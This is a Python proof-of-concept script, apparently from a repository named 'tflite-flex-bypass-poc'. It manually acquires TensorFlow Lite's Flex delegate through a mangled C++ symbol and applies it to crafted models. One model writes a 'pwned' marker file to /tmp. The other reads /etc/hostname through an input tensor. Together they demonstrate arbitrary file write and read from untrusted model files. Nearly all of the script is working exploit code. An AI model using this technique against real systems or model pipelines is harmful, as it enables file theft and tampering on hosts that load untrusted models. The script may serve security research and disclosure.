# tflite-flex-bypass-poc / flex_test.py
# Uploaded by Rammadaeus with huggingface_hub (commit 1599cc5, verified).
import os, ctypes
# Import TF first
import tensorflow as tf
from tensorflow.lite.python.interpreter_wrapper import _pywrap_tensorflow_interpreter_wrapper as wrapper
# Locate TFLite's shared "common" library inside the installed TensorFlow
# package and load it with RTLD_GLOBAL, so its symbols are made available to
# shared libraries loaded afterwards.
tf_dir = os.path.split(tf.__file__)[0]
common_path = os.path.join(tf_dir, "lite/python/libpywrap_tflite_common.so")
common_lib = ctypes.CDLL(name=common_path, mode=ctypes.RTLD_GLOBAL)

# tflite::AcquireFlexDelegate(), looked up by its mangled C++ symbol name and
# called as a zero-argument function whose result is read as a raw address.
# NOTE(review): if this function returns a std::unique_ptr by value, the
# Itanium C++ ABI returns it through a hidden pointer argument. Reading it as
# a plain `void *` return may then not yield the delegate address - confirm.
acquire = getattr(common_lib, "_ZN6tflite19AcquireFlexDelegateEv")
acquire.argtypes = []
acquire.restype = ctypes.c_void_p
flex_ptr = acquire()
flex_ptr_text = "NULL" if not flex_ptr else hex(flex_ptr)
print(f"FlexDelegate ptr: {flex_ptr_text}")
# Path the write test checks for after Invoke().
_WRITE_MARKER = "/tmp/tflite_pwned.txt"


def _print_error(exc):
    """Print an exception's type name and the first 500 characters of its message."""
    print(f"Error: {type(exc).__name__}: {str(exc)[:500]}")


def _load_delegated(model_path):
    """Build an interpreter wrapper for *model_path* and apply the Flex delegate to it.

    Keeping file reading, wrapper creation and delegate application in one place
    ensures every test delegates its *own* interpreter.

    Args:
        model_path: Path to a ``.tflite`` flatbuffer, read in binary mode.

    Returns:
        ``(interpreter_wrapper, result)``, where ``result`` is whatever
        ``ModifyGraphWithDelegate`` returned.
    """
    with open(model_path, "rb") as model_file:
        data = model_file.read()
    # Positional options are passed through unchanged. Their meaning is defined
    # by the pywrap binding. NOTE(review): document these values.
    interp = wrapper.CreateWrapperFromBuffer(data, 1, [], True, True)
    print("Created interpreter wrapper")
    status = interp.ModifyGraphWithDelegate(flex_ptr)
    print(f"ModifyGraphWithDelegate: {status}")
    return interp, status


if not flex_ptr:
    print("FlexDelegate is NULL")
    # No delegate available: report whether tflite::IsFlexOp(const char*)
    # classifies the two op names used by the test models as Flex ops.
    is_flex = common_lib._ZN6tflite8IsFlexOpEPKc
    is_flex.restype = ctypes.c_bool
    is_flex.argtypes = [ctypes.c_char_p]
    print(f"IsFlexOp(FlexWriteFile): {is_flex(b'FlexWriteFile')}")
    print(f"IsFlexOp(FlexReadFile): {is_flex(b'FlexReadFile')}")
else:
    import numpy as np  # used only to build the flex_read input tensor

    # --- flex_write: run the model, then look for the marker file ---
    print("\n=== Testing flex_write.tflite with FlexDelegate ===")
    # Clear any marker left by an earlier run so a stale file cannot be
    # mistaken for a write performed by this run.
    try:
        os.remove(_WRITE_MARKER)
    except FileNotFoundError:
        pass
    except OSError as err:
        print(f"Warning: could not remove stale {_WRITE_MARKER}: {err}")
    w, result = _load_delegated("models/flex_write.tflite")
    try:
        w.AllocateTensors()
        print("AllocateTensors succeeded!")
        w.Invoke()
        print("Invoke succeeded!")
        if os.path.exists(_WRITE_MARKER):
            with open(_WRITE_MARKER) as f:
                print(f"*** FILE WRITTEN: {f.read()} ***")
        else:
            print("File not written")
    except Exception as e:
        _print_error(e)

    # --- flex_read: feed a path as input tensor 0, print output tensor 1 ---
    print("\n=== Testing flex_read.tflite with FlexDelegate ===")
    # The delegate is applied to w2 here. Previously it was wrongly re-applied
    # to the write interpreter w.
    w2, _ = _load_delegated("models/flex_read.tflite")
    try:
        w2.AllocateTensors()
        print("AllocateTensors succeeded!")
        w2.SetTensor(0, np.array(b"/etc/hostname"))
        w2.Invoke()
        print("Invoke succeeded!")
        output = w2.GetTensor(1)
        print(f"*** FILE READ: {output} ***")
    except Exception as e:
        _print_error(e)